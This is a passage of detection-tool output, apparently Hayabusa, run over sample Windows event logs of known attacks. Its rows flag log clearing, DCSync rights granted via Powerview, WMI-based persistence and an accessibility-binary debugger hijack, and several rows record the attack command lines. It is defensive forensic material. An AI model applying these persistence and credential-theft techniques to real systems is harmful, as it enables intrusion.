C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent 
Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: 
C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 
08:18:55.404 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process 
Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process 
Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : 
Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : 
Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k 
DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,System log file was cleared,User: user01,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx +2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx +2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx +2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 
+2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\user01\Desktop\WMIGhost.exe"" : Path: C:\Users\user01\Desktop\WMIGhost.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 
+2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Suspicious Scripting in a WMI Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:11:54.198 +09:00,PC04.example.corp,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\scrcons.exe -Embedding : Path: C:\Windows\System32\wbem\scrcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation/win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 